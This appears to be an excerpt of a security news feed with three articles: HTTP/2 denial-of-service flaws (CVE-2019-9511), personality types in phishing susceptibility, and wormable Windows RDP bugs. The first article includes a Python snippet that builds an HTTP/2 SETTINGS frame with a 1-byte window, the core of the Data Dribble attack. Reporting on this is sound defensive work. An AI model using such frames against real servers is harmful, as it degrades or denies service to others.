A quick mitigation for all of these attacks in cases where a patch is not available or can’t be applied right away is to disable HTTP/2 support. Attacks on these weaknesses are not highly complex or resource-intensive, so the bar for an adversary to take advantage of one of them is relatively low. For example, the so-called Data Dribble weakness (CVE-2019-9511) simply requires an attacker to ask for big chunks of data over multiple connections.

“The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both, potentially leading to a denial of service,” the advisory says.
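
Mechanically, a client advertises its flow-control window through a standard SETTINGS frame, so nothing protocol-violating is required. The sketch below only builds the frame bytes per RFC 7540 to show how small the advertised window can be; it is not a working exploit.

```python
import struct

def h2_frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    # RFC 7540 frame header: 24-bit length, 8-bit type, 8-bit flags,
    # then 1 reserved bit plus a 31-bit stream identifier.
    header = struct.pack(">I", len(payload))[1:] + bytes([ftype, flags])
    header += struct.pack(">I", stream_id & 0x7FFFFFFF)
    return header + payload

SETTINGS = 0x04                      # frame type, per RFC 7540
SETTINGS_INITIAL_WINDOW_SIZE = 0x0004  # setting identifier, per RFC 7540

# A client advertising a 1-byte flow-control window: the server must
# then dribble response data out one byte at a time, queueing the rest.
payload = struct.pack(">HI", SETTINGS_INITIAL_WINDOW_SIZE, 1)
frame = h2_frame(SETTINGS, 0, 0, payload)  # SETTINGS always on stream 0
assert frame == b"\x00\x00\x06\x04\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01"
```

Because the frame is perfectly legal HTTP/2, the cost of the attack falls on how each server implementation queues the byte-at-a-time output, which is exactly where the vulnerable implementations burn memory and CPU.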

These weaknesses affect not just individual sites, but also some of the larger content delivery networks and hosting providers. Engineers at Cloudflare were notified of the vulnerabilities a few weeks ago and set about patching affected servers immediately.

“As soon as we became aware of these vulnerabilities, Cloudflare’s Protocols team started working on fixing them. We first pushed a patch to detect any attack attempts and to see if any normal traffic would be affected by our mitigations. This was followed up with work to mitigate these vulnerabilities; we pushed the changes out few weeks ago and continue to monitor similar attacks on our stack,” Ahamed Nafeez of Cloudflare said in a post on the company’s response.

]]>
<![CDATA[Personality Types May Be Useful in Security Training]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/personality-types-may-be-useful-in-security-training https://duo.com/decipher/personality-types-may-be-useful-in-security-training Wed, 14 Aug 2019 00:00:00 -0400

Research suggests that people’s personality types can influence whether they would be more likely to fall for social engineering attacks or less likely to click on phishing links. The combination of information security with business psychology is an intriguing area to explore, but it may unfairly shift the burden of security onto the individual.

Different personality types have different strengths and weaknesses in how they understand—and deal with—cybersecurity, researchers from ESET and Myers-Briggs said in their Cyberchology report. People who focus more on the outside world tended to be more vulnerable to social engineering and people who observe and remember details are better at spotting risks, the study found.

Personality tests that claim to give people insights into how they perceive the world are easy to find, and many enterprises adopted the Myers-Briggs Type Indicator (MBTI) to figure out how to manage employees back in the 1980s. The practice still exists in many industry sectors as managers believe the MBTI helps them adjust team dynamics to create an effective workplace. Now the idea is that similar assessments can help organizations figure out what blindspots their employees may have regarding information security and to customize security training to strengthen those areas.

A self-reported questionnaire, MBTI organizes personality along four psychological features—sensation, intuition, feeling, and thinking—to create the four major categories: Introversion/Extraversion, Sensing/Intuition, Thinking/Feeling, and Judging/Perception. MBTI defines where people draw their energy, how they learn, how they make decisions, and whether they prefer a structured or open-ended approach. ESET and Myers-Briggs polled 520 people who had completed MBTI assessments in Europe for this study with questions about their jobs, security habits, phishing experiences, and overall security knowledge.

The researchers drew upon MBTI concepts when they looked at five personality types: “extraverted personality,” or those that focus on the outside world and work out ideas by talking them through; those that prefer to “sense,” as they observe and remember details; those that “feel,” as they are guided by personal values; those that “judge,” as they tend to be systematic and structured; and people with a preference for “thinking,” as they approach problems logically.

Let's get one thing straight: No personality type is “more secure” than others. As with many things in information security, it’s complicated.

Security Strengths and Weaknesses

People with extraverted personalities “tend to be more vulnerable to manipulation, deceit, and persuasion from cybercriminals” but their being more aware of what is happening around them means they are “generally faster to pick up on attacks coming in from outside,” the researchers said.

Phishing attacks are less likely to be effective if the targeted person has a preference for sensing because that person is better with details, but that person may take more security risks. People with a preference for “thinking” tend to be very logical, so are more cautious and more rigorous about following security policies. However, this same group is more likely to overestimate their competencies, which leads to mistakes. They scored highly on security knowledge, but they were likely to think that the rules didn’t apply to them.

The value in understanding personality types seems to lie in changing how security is taught. Just as managers rely on the MBTI to adjust how they manage their employees and understand team dynamics to create the most effective working environment, the researchers suggested that personality profiles can be used to customize security training. The training materials can be tailored to take into account employee personalities and behavioral preferences when explaining the role each person plays in securing company data. A common security training lesson is to have people scrutinize email headers to make sure the addresses look legitimate. This is a skill that comes naturally to the thinking types, but may be harder for others.

Knowing what people respond to would be helpful in teaching them what to be more wary of. A phishing email that relies on facts or talks about a benefit (such as saving money) would be more effective on people who fall on the objective and analytical side of the equation. The sensing and feeling types tend to be more trusting and loyal, so they would be more vulnerable to a phishing email that appears to come from an authority figure. The intuition and feeling types may be more likely to fall for a phishing email disguised as a charity request.

The challenge of relying too much on personality types is that it opens up a trap of explaining that an attack happened because of a person’s alignment. The last thing anyone needs is deciding that a certain type of personality profile is a “better” security employee for that company’s risk profile.

While customizing security training to recognize that some things are easier for some people than others is a useful idea, it’s important to realize that security awareness training is just one item in the security portfolio. There is a tendency to put the onus of security defense on the individual—if you click on the link, we will get breached; if you don’t follow this process, the data will be stolen—which is unfair to the individual. People will make mistakes and forget things. Even the savviest, most security-aware person will fall for a carefully crafted phishing attack. This is where the bulk of enterprise defense lies: setting up automated systems that check that procedures have been followed, or deploying technology to ensure the proper controls are in place.

Security training is important, but it is just one item. It can catch some attacks and it helps people identify their weaknesses so that they can adjust their behavior accordingly.

"Overlaying organization-wide self-awareness with a robust cyber security system can create a net of human/digital skills and proclivities which cybercriminals will have trouble slipping through," the researchers said.

Human Behavior and Security

Many organizations have been exploring the intersection of personality and security to figure out why people make decisions and take risks. Forcepoint X-Labs has identified five relevant personality traits: neuroticism, extraversion, openness, agreeableness, and conscientiousness. Forcepoint X-Labs recently examined how cognitive bias can also influence how people make security decisions.

It's not just security awareness training. A data protection officer at a major European airline has discussed how to use the idea of personality in a supply chain situation to assess a third-party provider's security risk.

Panorays earlier this year discussed how it looks at the “employee attack likelihood,” a score estimating how likely a person is to be targeted in an attack. Employees may be targeted because their job titles or roles in certain departments give them access to specific types of information or systems. While an executive may have access to sensitive information, an IT administrator would have extensive privileges. The score also takes into account the person's digital footprint and whether their credentials have been leaked in other data breaches.

“The human factor is always the wild card when considering the cyber resilience of an organization,” said Matan Or-El, CEO and co-founder of Panorays.

]]>
<![CDATA[Two New BlueKeep-Like Flaws Emerge in Windows]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/two-new-bluekeep-like-flaws-emerge-in-windows https://duo.com/decipher/two-new-bluekeep-like-flaws-emerge-in-windows Tue, 13 Aug 2019 00:00:00 -0400

Microsoft is urging customers to patch a pair of critical vulnerabilities in Windows that were fixed today, both of which could be used to spawn a worm, like the BlueKeep vulnerability disclosed in May.

The two weaknesses affect all supported versions of Windows 10, along with Windows 7 SP1, Windows 8.1, Windows Server 2008 R2 SP1, Windows Server 2012, and Windows Server 2012 R2. Like the BlueKeep vulnerability, these two new bugs are in the Remote Desktop Services component in Windows and both are exploitable remotely without any authentication. Because of the pre-authentication exploitability and the fact that the bugs are in RDS, Microsoft researchers are worried about the potential of a worm emerging to exploit large numbers of vulnerable machines.

Microsoft discovered the flaws internally while reviewing the security of the RDS component.

“These vulnerabilities were discovered by Microsoft during hardening of Remote Desktop Services as part of our continual focus on strengthening the security of our products. At this time, we have no evidence that these vulnerabilities were known to any third party,” Simon Pope, director of incident response at the Microsoft Security Response Center, said.

“It is important that affected systems are patched as quickly as possible because of the elevated risks associated with wormable vulnerabilities like these.”

RDS is the Windows implementation of the Remote Desktop Protocol and used to be known as Terminal Services in previous versions of Windows. In May, Microsoft released a patch for a similar vulnerability known as BlueKeep and even published fixes for older versions of Windows that were no longer supported because of concerns that a worm might emerge to take advantage of the flaw. In July, Immunity Inc. released an exploit for the BlueKeep vulnerability in its CANVAS penetration testing platform, heightening those concerns. However, so far no large-scale worms have appeared.

While it’s too soon to know how things will play out for these two new vulnerabilities, Pope said some systems are protected against the possibility of a worm exploiting the bugs.

“There is partial mitigation on affected systems that have Network Level Authentication (NLA) enabled. The affected systems are mitigated against ‘wormable’ malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate,” Pope said.

]]>